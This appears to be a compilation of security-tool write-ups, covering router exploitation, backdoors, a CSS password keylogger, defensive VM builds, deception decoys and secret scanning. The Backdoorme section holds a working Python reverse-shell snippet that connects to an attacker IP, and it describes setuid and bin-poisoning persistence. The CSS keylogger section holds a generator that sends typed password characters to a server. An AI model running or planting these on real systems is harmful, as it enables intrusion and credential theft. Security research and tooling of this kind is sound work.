
RouterSploit v3.0 - Exploitation Framework For Embedded Devices


The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.


It consists of various modules that aid penetration testing operations:
  • exploits - modules that take advantage of identified vulnerabilities
  • creds - modules designed to test credentials against network services
  • scanners - modules that check if a target is vulnerable to any exploit
  • payloads - modules that are responsible for generating payloads for various architectures and injection points
  • generic - modules that perform generic attacks

Installation

Requirements
Required:
  • future
  • requests
  • paramiko
  • pysnmp
  • pycrypto
Optional:
  • bluepy - bluetooth low energy

Installation on Kali Linux
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy support:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation on Ubuntu 18.04 & 17.10
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy support:
sudo apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation on OSX
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Running on Docker
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Update
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
cd routersploit
git pull



DefectDojo - Application Vulnerability Correlation And Security Orchestration Application


DefectDojo is a security program and vulnerability management tool. DefectDojo allows you to manage your application security program, maintain product and application information, schedule scans, triage vulnerabilities and push findings into defect trackers. Consolidate your findings into one source of truth with DefectDojo.

Quick Start
$ git clone https://github.com/DefectDojo/django-DefectDojo
$ cd django-DefectDojo
$ ./setup.bash
$ ./run_dojo.bash
navigate to 127.0.0.1:8000

Demo
If you'd like to try a demo of DefectDojo before installing it, you can check out our PythonAnywhere demo site.

You can log in as an administrator like so:

You can also log in as a product owner / non-staff user:

Additional Documentation
For additional documentation you can visit our Read the Docs site.

Installation Options

Debian, Ubuntu (16.04.2+) or RHEL-based Install Script
Docker
Ansible

Getting Started
We recommend checking out the about document to learn the terminology of DefectDojo, and the getting started guide for setting up a new installation. We've also created some example workflows that should give you an idea of how to use DefectDojo for your own team.

DefectDojo Client APIs
  • DefectDojo Python API: pip install defectdojo_api or clone the repository.


Backdoorme - Powerful Auto-Backdooring Utility


Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time.
Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained.
Please only use Backdoorme with explicit permission - please don't hack without asking.

Usage
Backdoorme is split into two parts: backdoors and modules.
Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety.
Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence.

Setup
To start backdoorme, first ensure that you have the required dependencies.
For Python 3.5+:
$ sudo apt-get install python3 python3-pip python3-tk nmap                                 
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
For Python 2.7:
$ sudo python dependencies.py

Getting Started
Launching backdoorme:
$ python master.py
To add a target:
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>

Backdoors
To use a backdoor, simply run the "use" keyword.
>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>
From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.
(msf) >> show options
Backdoor options:

Option    Value    Description             Required
------    -----    -----------             --------
name      initd    name of the backdoor    False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:

Option    Value    Description             Required
------    -----    -----------             --------
name      apache   name of the backdoor    False
...
As in metasploit, backdoors are organized by category.
  • Auxiliary
    • keylogger - Adds a keylogger to the system and gives the option to email results back to you.
    • simplehttp - installs python's SimpleHTTP server on the client.
    • user - adds a new user to the target.
    • web - installs an Apache Server on the client.
  • Escalation
    • setuid - the SetUID backdoor works by setting the setuid bit on a binary while the user has root access, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unprivileged user and still be able to run nano (or any chosen binary) as root ('nano /etc/shadow'). Note that root access is initially required to deploy this escalation backdoor.
    • shell - the shell backdoor is a privilege escalation backdoor, similar to (but more specific than) its SetUID escalation sibling. It duplicates the bash shell to a hidden binary and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use it, while SSHed in as an unprivileged user, simply run ".bash -p", and you will have root access.
  • Shell
    • bash - uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.
    • bash2 - a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.
    • sh - Similar to the first bash backdoor, but redirects input to /bin/sh.
    • sh2 - Similar to the second bash backdoor, but redirects input to /bin/sh.
    • metasploit - employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.
    • java - creates a socket connection using libraries from Java and compiles the backdoor on the target.
    • ruby - uses ruby's libraries to create a connection, then redirects to /bin/bash.
    • netcat - uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.
    • netcat_traditional - utilizes netcat-traditional's -e option to create a reverse shell.
    • perl - a script written in perl which redirects output to bash, and renames the process to look less conspicuous.
    • php - runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module.
    • python - uses a short python script to perform commands and send output back to the user (a generic sketch of this reverse-shell pattern follows the category list below).
    • web - ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.
  • Access
    • remove_ssh - removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces.
    • ssh_key - creates RSA key and copies to target for a passwordless ssh connection.
    • ssh_port - Adds a new port for ssh.
  • Windows
    • windows - Uses msfvenom to create a windows backdoor.
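For illustration, here is a generic sketch of the reverse-shell pattern the Shell-category backdoors above rely on (connect back to an attacker-controlled IP/port and wire the socket to an interactive shell). This is not Backdoorme's actual payload; the address and port are placeholders.
# Generic reverse-shell pattern (illustration only, not Backdoorme's actual payload).
import os
import socket
import subprocess

ATTACKER_IP = "10.1.0.1"   # placeholder: host running your listener
ATTACKER_PORT = 4444       # placeholder: listener port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ATTACKER_IP, ATTACKER_PORT))

# Point stdin, stdout and stderr at the socket so the shell is interactive.
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)

subprocess.call(["/bin/sh", "-i"])
A module such as cron or startup would then be responsible for re-launching a script like this to maintain persistence.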

Modules
Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.
(msf) >> add poison
+ Poison module added
Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.
(msf) >> help
...
Poison module options:

Option      Value    Description                         Required
------      -----    -----------                         --------
name        ls       name of command to poison           False
location    /bin     where to put poisoned files into    False
Currently enabled modules include:
  • Poison
  • Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor.
  • For example, if the bin poisoning module is triggered with "ls", it would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tricking the user into running an existing backdoor more frequently.
  • Cron
  • Adds an existing backdoor to the root user's crontab to run with a given frequency.
  • Web
  • Sets up a web server and places a web page which triggers the backdoor.
  • Simply visit the site with your listener open and the backdoor will begin.
  • User
  • Adds a new user to the target.
  • Startup
  • Allows for backdoors to be spawned with the bashrc and init files.
  • Whitelist
  • Whitelists an IP so that only that IP can connect to the backdoor.

Targets
Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available.


BlackArch Linux v2018.06.01 - Penetration Testing Distribution


BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1981 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

ChangeLog:
  • added more than 60 new tools
  • added config files for i3-wm (BlackArch compatible)
  • network stack tunings (sysctl + tuning.sh)
  • added system/pacman clean-up script (consistency++)
  • switched to terminus font (console, LXDM, WMs, x-terminals, ...)
  • replaced second browser midori with chromium
  • really, a lot of clean-ups and many tweaks!
  • renamed ISO filename
  • fixed awesome-wm quit/exit issue
  • fixed system group and user failures
  • fixed kernel module load failures
  • update blackarch installer to version 0.7 (bugfix + many improvements)
  • included linux kernel 4.16.12
  • updated all blackarch tools and packages including config files
  • updated all system packages
  • updated all window manager menus (awesome, fluxbox, openbox)
  • re-add multilib

Download and Installation

BlackArch Linux only takes a moment to set up.
There are three ways to go:
  1. Install on an existing Arch machine.
  2. Use the live ISO.
  3. The live ISO comes with an installer (blackarch-install). You can use the installer to install BlackArch to your hard disk.

CSS Keylogger - Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS


Chrome extension and Express server that exploits keylogging abilities of CSS.

To use

Setup Chrome extension
  1. Download repository git clone https://github.com/maxchehab/CSS-Keylogging
  2. Visit chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu's icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).
  3. Ensure that the Developer mode checkbox in the top right-hand corner is checked.
  4. Click Load unpacked extension… to pop up a file-selection dialog.
  5. Select the css-keylogger-extension in the directory which you downloaded this repository.

Setup Express server
  1. yarn
  2. yarn start

Haxking l33t passw0rds
  1. Open a website that uses a controlled component framework such as React (e.g. https://instagram.com).
  2. Click the extension icon (labelled "C") at the top right of any webpage.
  3. Type your password.
  4. Your password should be captured by the express server.

How it works
This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.
For example, the following CSS will select all inputs whose type equals "password" and whose value ends with "a". It will then try to load an image from http://localhost:3000/a.
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
Using a simple script one can create a css file that will send a custom request for every ASCII character.
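A minimal sketch of such a generator is shown below. It assumes the same http://localhost:3000 collection endpoint used in the example above and, for brevity, only covers letters and digits; the remaining ASCII characters would additionally need CSS selector escaping and URL encoding.
# Sketch of a CSS-keylogger stylesheet generator (letters and digits only).
import string

ENDPOINT = "http://localhost:3000"  # the Express server from this project

rules = []
for ch in string.ascii_letters + string.digits:
    # One rule per character: when the password field's value ends with `ch`,
    # the browser requests ENDPOINT/<ch>, leaking that keystroke.
    rules.append(
        'input[type="password"][value$="%s"] {\n'
        '  background-image: url("%s/%s");\n'
        '}' % (ch, ENDPOINT, ch)
    )

with open("keylogger.css", "w") as f:
    f.write("\n".join(rules))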


DARKSURGEON - A Windows Packer Project To Empower Incident Response, Digital Forensics, Malware Analysis, And Network Defense


DARKSURGEON is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense.
DARKSURGEON has three stated goals:
  • Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities. 
  • Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant.
  • Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10.
If you haven't worked with packer before, this project has a simple premise:
Provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys.
Please note this is an alpha project and it will be subject to continual development, updates, and package breakage.

Development Principles
DARKSURGEON is based on a few key development principles:
  • Modularity is key. Each component of the installation and configuration process should be modular. This allows for individuals to tailor their packer image in the most flexible way.
  • Builds must be atomic. A packer build should either complete all configuration and installation tasks without errors, or it should fail. A packer image with missing tools is a failure scenario.
  • Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on DARKSURGEON security can be found later in this post. 
  • Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration.
  • Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection.

Hardening
DARKSURGEON is hardened out of the box, and comes with scripts to enable High or Low security modes.
All default installations of DARKSURGEON have the following security features enabled:
  • Windows Secure Boot is Enabled.
  • Windows Event Log Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)
  • Windows Powershell Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)
  • Windows 10 Privacy and Telemetry are Reduced to Minimal Settings. (Microsoft Guidance)
  • Sysinternals Sysmon is Installed and Configured. (SwiftonSecurity Public Ruleset)
  • LLMNR is Disabled.
  • NBT is Disabled.
  • WPAD is Removed.
  • Powershell v2 is Removed.
  • SMB v1 is Removed.
  • Application handlers for commonly-abused file extensions are changed to notepad.exe.
Additionally, the user may specify a Low or High security mode by using the appropriate scripts. The default setting is to build an image in Low Security mode.
Low Security mode is primarily used for virtual machines intended for reverse engineering, malware analysis, or systems that cannot support VBS security controls.
In Low Security mode, the following hardening features are configured:
  • Windows Defender Anti-Virus Real-Time Scanning is Disabled.
  • Windows Defender SmartScreen is Disabled.
  • Windows Defender Credential Guard is Disabled.
  • Windows Defender Exploit Guard is Disabled.
  • Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Disabled.
  • Windows Defender Application Guard is Disabled.
  • Windows Defender Application Guard does not enforce isolation.
Note: High Security mode is still in development.
High Security mode is primarily used for production deployment of sensitive systems (e.g. Privileged Access Workstations) and may require additional tailoring or configuration.
In High Security mode, the following hardening features are configured:
  • Windows Defender Anti-Virus Real-Time Scanning is Enabled.
  • Windows Defender SmartScreen is Enabled and applied to All Traffic.
  • Windows Defender Credential Guard is Enabled.
  • Windows Defender Exploit Guard is Enabled.
  • Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Enabled.
  • Windows Defender Application Guard is Enabled.
  • Windows Defender Application Guard enforces isolation.

Telemetry
Whether analyzing unknown binaries or working on sensitive projects, endpoint telemetry powers detection and response operations. DARKSURGEON comes pre-configured with the following telemetry sources available for analysis:

Privacy
Your operational environment contains some of the most sensitive data from your network, and it's important to safeguard that from prying eyes. DARKSURGEON implements the following strategies to maximize privacy without hindering workflows:
  • Windows 10 telemetry settings are configured to minimize collection.
  • Cortana, diagnostics, tracking, and other services are disabled.
  • Windows Error Reporting (WER) is disabled.
  • Windows Timeline, shared clipboard, device hand-off, and other synchronize-by-default applications are disabled or neutered. 
  • Microsoft Guidance for reducing telemetry and data collection has been implemented.

Packages
Out of the box, DARKSURGEON comes equipped with tools, scripts, and binaries to make your life as a defender easier.
Android Analysis:
Tools, scripts, and binaries focused on android analysis and reverse engineering.
  • APKTool (FLARE)
Blue Team:
Tools, scripts, and binaries focused on blue team, network defense, and alerting/detection development.
  • ACE
  • Bloodhound / Sharphound
  • CimSweep
  • Dumpsterfire
  • EndGame Red Team Automation (RTA)
  • Kansa
  • Posh-Git
  • Invoke-ATTACKAPI
  • LOLBAS (Living Off the Land Binaries And Scripts)
  • OSX Collector
  • Posh-SecMod
  • Posh-Sysmon
  • PowerForensics
  • PowerSploit
  • Practical Malware Analysis Labs (FLARE)
  • Revoke-Obfuscation
  • Yara (FLARE)
Debuggers:
Tools, scripts, and binaries for debugging binary artifacts.
  • Ollydbg (FLARE)
  • OllyDump (FLARE)
  • OllyDumpEx (FLARE)
  • Ollydbg2 (FLARE)
  • OllyDump2Ex (FLARE)
  • x64dbg (FLARE)
  • Windbg (FLARE)
Disassemblers:
Tools, scripts, and binaries for disassembling binary artifacts.
  • IDA Free Trial (FLARE)
  • Binary Ninja Demo (FLARE)
  • Radare2 (FLARE)
Document Analysis:
Tools, scripts, and binaries for performing analysis of documents.
  • OffVis (FLARE)
  • OfficeMalScanner (FLARE)
  • PDFId (FLARE)
  • PDFParser (FLARE)
  • PDFStreamDumper (FLARE)
DotNet Analysis:
Tools, scripts, and binaries for performing analysis of DotNet artifacts.
  • DE4Dot (FLARE)
  • DNSpy (FLARE)
  • DotPeek (FLARE)
  • ILSpy (FLARE)
Flash Analysis:
Tools, scripts, and binaries for performing analysis of flash artifacts.
  • FFDec (FLARE)
Forensic Analysis:
Tools, scripts, and binaries for performing forensic analysis on application and operating system artifacts.
  • Amcache Parser
  • AppCompatCache Parser
  • IISGeolocate
  • JLECmd
  • LECmd
  • JumpList Explorer
  • PECmd
  • Registry Explorer
  • Regshot (FLARE)
  • Shellbags Explorer
  • Timeline Explorer
  • TSK (The Sleuthkit)
  • Volatility
  • X-Ways Forensics Installer Manager (XWFIM)
Hex Editors:
  • FileInsight (FLARE)
  • HxD (FLARE)
  • 010 Editor (FLARE)
Java Analysis:
  • JD-GUI (FLARE)
  • Dex2JAR
Network Analysis:
  • Burp Free
  • FakeNet-NG (FLARE)
  • Wireshark (FLARE)
PE Analysis:
  • DIE (FLARE)
  • EXEInfoPE (FLARE)
  • Malware Analysis Pack (MAP) (FLARE)
  • PEiD (FLARE)
  • ExplorerSuite (CFF Explorer) (FLARE)
  • PEStudio (FLARE)
  • PEview (FLARE)
  • Resource Hacker (FLARE)
  • VirusTotal Uploader
Powershell Modules:
  • Active Directory
  • Azure Management
  • Pester
Python Libraries:
  • Cryptography
  • Hexdump
  • OLETools
  • LXML
  • Pandas
  • Passivetotal
  • PEFile
  • PyCryptodome
  • Scapy
  • Shodan
  • Sigma
  • Visual C++ for Python
  • Vivisect
  • WinAppDBG
  • Yara-Python
Red Team:
  • Grouper
  • Inveigh
  • Nmap
  • Powershell Empire
  • PowerupSQL
  • PSAttack
  • PSAttack Build Tool
  • Responder
Remote Management:
  • AWS Command Line (AWSCLI)
  • OpenSSH
  • Putty
  • Remote Server Administration Tools (RSAT)
Utilities:
  • 1Password
  • 7Zip
  • Adobe Flash Player
  • Adobe Reader
  • API Monitor
  • Bleachbit
  • Boxstarter
  • Bstrings
  • Checksum
  • Chocolatey
  • Cmder
  • Containers (Hyper-V)
  • Curl
  • Cyber Chef
  • Docker
  • DotNet 3.5
  • DotNet 4
  • Exiftool
  • FLOSS (FLARE)
  • Git
  • GoLang
  • Google Chrome
  • GPG4Win
  • Hashcalc
  • Hashdeep
  • Hasher
  • Hashtab
  • Hyper-V
  • Irfanview
  • Java JDK8
  • Java JRE8
  • JQ
  • Jupyter
  • Keepass
  • Microsoft Edge
  • Mozilla Firefox
  • Mozilla Thunderbird
  • Neo4j Community
  • NodeJS
  • Nuget
  • Office365 ProPlus
  • OpenVPN
  • Osquery
  • Python 2.7
  • Qbittorrent
  • RawCap
  • Slack
  • Sublime Text 3
  • Sysinternals Suite
  • Tor Browser
  • UnixUtils
  • UPX
  • Visual C++ 2005
  • Visual C++ 2008
  • Visual C++ 2010
  • Visual C++ 2012
  • Visual C++ 2013
  • Visual C++ 2015
  • Visual C++ 2017
  • Visual Studio Code
  • Windows 10 SDK
  • Windows Subsystem for Linux (WSL)
  • Winlogbeat
  • XorSearch
  • XorStrings
Visual Basic Analysis:
  • VBDecompiler

Building DARKSURGEON

Build Process
DARKSURGEON is built using HashiCorp's Packer. The total build time for a new instance of DARKSURGEON is around 2–3 hours.
  1. Packer creates a new virtual machine using the DARKSURGEON JSON file and your hypervisor of choice (e.g. Hyper-V, Virtualbox, VMWare).
  2. The answers.iso file is mounted inside the DARKSURGEON VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of windows, as well as a powershell script to configure Windows Remote Management (winrm).
  3. Packer connects to the DARKSURGEON VM using WinRM and copies over all files in the helper-scripts and configuration-files directory to the host.
  4. Packer performs serial installations of each of the configured powershell scripts, performing occasional reboots as needed. 
  5. When complete, packer performs a sysprep, shuts down the virtual machine, and creates a vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file.

Setup
Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.
  1. Install packer, vagrant, and your preferred hypervisor on your host.
  2. Download the repository contents to your host.
  3. Download a Windows 10 Enterprise Evaluation ISO (1803).
  4. Move the ISO file to your local DARKSURGEON repository.
  5. Update DARKSURGEON.json with the ISO SHA1 hash and file name.
  6. (Optional) Execute the powershell script New-DARKSURGEONISO.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository but you may re-build this if you don't trust it, or you would like to modify the unattend files: powershell.exe New-DARKSURGEONISO.ps1
  7. Build the recipe using packer: packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.json

Configuring DARKSURGEON
DARKSURGEON is designed to be modular and easy to configure. An example configuration is provided in the DARKSURGEON.json file, but you may add, remove, or tweak any of the underlying scripts.
Have a custom CA you need to add? Need to add a license file for IDA? No problem. You can throw any files you need in the configuration-files directory and they'll be copied over to the host for you.
Want to install a custom package, or need some specific OS tweaks? No worries. Simply make a new powershell script (or modify an existing one) in the configuration-scripts directory and add it as a build step in the packer JSON file.

Using DARKSURGEON
Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.
Once DARKSURGEON has successfully built, you'll receive an output vagrant box file. The box file contains the virtual machine image and vagrant metadata, allowing you to quickly spin up a virtual machine as needed.
  1. Install vagrant and your preferred hypervisor on your host.
  2. Navigate to the DARKSURGEON repository (or the location where you've saved the DARKSURGEON box file). 
  3. Perform a vagrant up: vagrant up
Vagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one?
Easy, just perform the following: vagrant destroy && vagrant up
Once the DARKSURGEON virtual machine is running, you can login using one of the two local accounts:
Note: These are default accounts with default credentials. You may want to consider changing the credentials in your packer build.
Administrator Account:
Username: Darksurgeon
Password: darksurgeon
Local User Account:
Username: Unprivileged
Password: unprivileged
If you'd rather not use vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by packer.

Downloading DARKSURGEON
If you'd rather skip the process of building DARKSURGEON and want to trust the box file I've built, you can simply download it here.

Contributing
Contributions, fixes, and improvements can be submitted directly against this project as a GitHub issue or pull request. Tools will be reviewed and added on a case-by-case basis.

Frequently Asked Questions

Why is Hyper-V the preferred hypervisor?
I strongly believe in the value of Windows Defender Device Guard and Virtualization Based Security, which require the usage of Hyper-V for optimal effectiveness. As a result, other hypervisors are not recommended on the host machine. I will do my best to accommodate other mainline hypervisors, but I would encourage all users to try using Hyper-V.

Why does the entire packer build fail on a chocolatey package error?
This was a design decision made to guarantee that all expected packages make it into the final packer build. The upside of this decision is that it guarantees all expected tools will be available in the finalized product. The downside is that additional complexity and fragility are inserted into the build pipeline, as transient errors or Chocolatey package errors may cause a build to fail.
If you wish to ignore this functionality, you are free to modify the underlying script to ignore errors on package installation.

Does this project support using a Chocolatey Professional/Business/Consultant license?
Yes. If you add your license file (named chocolatey.license.xml) to the configuration-files directory when performing a packer build, it will automatically be imported by the Set-ChocolateySettings.ps1 script. Please ensure that your usage of a chocolatey license adheres to their End-User License Agreement.

Why are the build functions broken into dozens of individual powershell scripts?
Flexibility is key. You may opt to use -- or not use -- any of these scripts, and in any order. Having individual files, while increasing project complexity, ensures that the project can be completely customized without issue.

I want to debug the build. How do I do so?
Add the Set-Breakpoint.ps1 script into the provisioner process at the desired point. This will cause the packer build to halt for 4 hours as it waits for the script to complete.

Troubleshooting

The packer build process never starts and hangs on the UEFI screen.
This is most likely a timing issue caused by the emulated key presses not causing the image to boot from the mounted Windows ISO. Restart your VM and hit any button a few times until the build process starts.

Packer timed out during the build. I didn't receive an error.
Due to the size of the packages that are downloaded and installed, you may have exceeded the default packer build time limit.

My VM is running, but packer doesn't seem to connect via WinRM.
Connect to the guest and check the following:
  • WinRM is accessible from your packer host. (Test-NetConnection -ComputerName <Packer IP Address> -Port 5985)
  • WinRM is allowed on the guest firewall.

I keep getting anti-virus, checksum, or other issues with Chocolatey. What gives?
Unfortunately these packages can be a moving target. New updates can render the static checksum in the chocolatey package incorrect, anti-virus may mistakenly flag binaries, etc. Global chocolatey options can be specified to prevent these errors from occurring, but I will do my best to respond to bug reports filed as issues on underlying chocolatey packages.

DejaVU - Open Source Deception Framework

Deception techniques, if deployed well, can be very effective for organizations to improve network defense and can be a useful arsenal for blue teams to detect attacks at a very early stage of the cyber kill chain. But the challenge we have seen is that deploying, managing and administering decoys across large networks is still not easy, and it becomes complex for defenders to manage over time. Although there are a lot of commercial tools in this space, we haven't come across open source tools which can achieve this.

With this in mind, we have developed DejaVu, an open source deception framework which can be used to deploy decoys across the infrastructure. Defenders can use it to deploy multiple interactive decoys (HTTP servers, SQL, SMB, FTP, SSH, client side – NBNS) strategically across their network on different VLANs. To ease the management of decoys, we have built a web-based platform which can be used to deploy, administer and configure all the decoys effectively from a centralized console. The logging and alerting dashboard displays detailed information about the alerts generated, and can be further configured to define how these alerts should be handled. If certain IPs, such as an in-house vulnerability scanner or SCCM, need to be whitelisted, this can be configured, which effectively means very few false positives.

Alerts only occur when an adversary engages with a decoy, so when the attacker touches a decoy during reconnaissance or attempts authentication, this raises a high-accuracy alert which should be investigated by the defense. Decoys can also be placed on client VLANs to detect client-side attacks such as responder/LLMNR attacks. Additionally, services which adversaries commonly abuse for an initial foothold, such as Tomcat or SQL Server, can be deployed as decoys, luring the attacker and enabling detection.
Video demo for tool is published here: Youtube URL

Architecture

  • Host OS: Primary OS hosting the DejaVu virtual box. Note: the primary host can be OS-independent (Windows/Linux) and can be based on corporate hardening guidelines.
  • DejaVu Virtual Box: Debian based image containing open source deception framework to deploy multiple interactive decoys (HTTP Servers, SQL, SMB, FTP, SSH, client side – NBNS).
  • Networking
    • Management Interface – An interface to access web based management console. (Recommended to be isolated from internal network.)
    • Decoy Interface – Trunk/Access interface for inbound connections from different networks towards the interactive decoys. (Recommended to block outbound connections from this interface)
    • Virtual Interfaces – Interfaces bridged with decoy interface to channel traffic towards the decoys.
  • Server Dockers – Docker based service containers– HTTP(Tomcat/Apache), SQL, SMB, FTP, SSH
  • Client Dockers – Docker based client container – NBNS client
  • Management Console (Web + DB) – A centralized console to deploy, administer and configure all the decoys effectively along with logging and alerting dashboard to display detailed information about the alerts generated.

Usage Guide
Initial Setup
  1. Configure the username/password for the admin panel:
php config.php --username=<provide username> --password=<provide password> --email=<provide email>
  2. Default URL to access the admin panel - http://192.168.56.102
  3. The VirtualBox network adapter type should be "PCNet" (full name is something like PCnet-FAST III).
  4. Set the SMTP configuration in "mailalert.php" to receive email alerts.
Now when you go to the default URL, you are greeted by the logon prompt:


Add Server Decoy
  1. To add a decoy, we first need to add a VLAN on which we want to later deploy Decoys.
    • Select Decoy Management -> Add VLAN
    • Enter the VLAN ID. Use the “List Available VLANs” option to list the VLANs tagged on the interface.

  2. To add a server decoy:
    • Select Decoy Management -> Add Server Decoy
    • Provide the details for the new decoy as shown below. Select the services (SMB/FTP/MySQL/Web Server/SSH) to be deployed, and use a dynamic IP or provide a static IP address.

  3. Let's do some port scans and authentication attempts from the attacker machine on the server VLAN and analyze the alerts.

  4. View the alerts triggered when the attacker scanned our decoy and tried to authenticate.
    • Select Log Management -> List Events

Add Client Decoy
  1. To add a client decoy:
    • Select Decoy Management -> Add Client Decoy
    • Provide the details for the new decoy as shown below. It's recommended to place the client decoy on user VLANs to detect responder/LLMNR attacks.

  2. Let's run Responder from the attacker machine on the end-user VLAN and analyze the alerts.

  3. View the alerts triggered when the attacker scanned our decoy and tried to authenticate.
    • Log management -> List Events

Filter Alerts
  1. Alerts can be filtered based on various parameters, for example: don't send alerts from IP 10.1.10.101. This is useful if certain IPs, such as an in-house vulnerability scanner or SCCM, need to be whitelisted.

To Do
  • Code Cleanup and sanitization
  • Persistence on reboot
  • Add client side decoys generating HTTP, FTP traffic
  • ISO image
  • Wiki

Authors
Bhadresh Patel (@bhdresh)
Harish Ramadoss (@hramados)


DumpsterDiver - Tool To Search Secrets In Various Filetypes


DumpsterDiver is a tool used to analyze big volumes of various file types in search of hardcoded secret keys (e.g. AWS Access Key, Azure Share Key or SSH keys). Additionally, it allows creating simple search rules with basic conditions (e.g. report only CSV files containing at least 10 email addresses). The main idea of this tool is to detect any potential secret leaks.

Key features:
  • it uses Shannon Entropy to find private keys.
  • it supports multiprocessing for analyzing files.
  • it unpacks compressed archives (e.g. zip, tar.gz etc.)
  • it supports advanced search using simple rules (details below)

Usage
usage: DumpsterDiver.py [-h] -p LOCAL_PATH [-r] [-a]

Command line options
  • -p LOCAL_PATH - path to the folder containing files to be analyzed.
  • -r, --remove - when this flag is set, then files which don't contain any secret (or anything interesting if -a flag is set) will be removed.
  • -a, --advance - when this flag is set, then all files will be additionally analyzed using rules specified in 'rules.yaml' file.

Pre-requisites
To run the DumpsterDiver you have to install python libraries. You can do this by running the following command:
pip install -r requirements.txt

Understanding config.yaml file
There is no single tool which fits everyone's needs, and DumpsterDiver is not an exception here. So, in the config.yaml file you can customize the program to search for exactly what you want. Below you can find a description of each setting.
  • logfile - specifies a file where logs should be saved.
  • excluded - specifies file extensions which you want to skip during a scan. There is no point in searching for hardcoded secrets in picture or video files, right?
  • min_key_length and max_key_length - specify the minimum and maximum length of the secret you're looking for. Depending on your needs, this setting can greatly limit the amount of false positives. For example, an AWS secret has a length of 40 bytes, so if you set min_key_length and max_key_length to 40 then DumpsterDiver will analyze only 40-byte strings. However, it won't take into account longer strings like an Azure shared key or a private SSH key. (A minimal sketch of this kind of length-plus-entropy filtering follows below.)
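As a rough illustration of that length-plus-entropy filtering (this is not DumpsterDiver's actual code, and the entropy threshold is an arbitrary example value):
# Illustrative length-plus-entropy filter; threshold is an example value.
import math
from collections import Counter

MIN_KEY_LENGTH = 40      # e.g. AWS secret keys are 40 characters long
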